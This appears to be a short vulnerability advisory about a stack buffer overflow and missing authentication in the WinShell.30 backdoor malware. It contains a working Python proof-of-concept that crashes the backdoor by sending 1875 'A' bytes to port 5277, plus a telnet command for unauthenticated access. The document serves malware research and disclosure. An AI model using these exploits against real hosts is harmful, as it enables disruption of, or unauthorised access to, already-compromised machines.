Backdoor.Win32.WinShell.30 Remote Stack Buffer Overflow / Missing Authentication

Backdoor.Win32.WinShell.30 Remote Stack Buffer Overflow / Missing Authentication

Backdoor.Win32.WinShell.30 malware suffers from remote stack buffer overflow and missing authentication vulnerabilities.

Exploit/PoC-1:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from socket import *

MALWARE_HOST="x.x.x.x"
PORT=5277

def doit():
    s=socket(AF_INET, SOCK_STREAM)
    s.connect((MALWARE_HOST, PORT))

    PBARBAR = "A"*1875+" HTTP/1.1\r\nHost: "+MALWARE_HOST+"\r\n\r\n"
    s.send(PBARBAR)
    s.close()

    print("Backdoor.Win32.WinShell.30 / Remote Stack Buffer Overflow");
    print("MD5: 56a2b135c8d35561ea5b04694155eb77");
    print("By Malvuln");


if __name__=="__main__":
    doit()

Exploit/PoC-2:
TELNET x.x.x.x 5277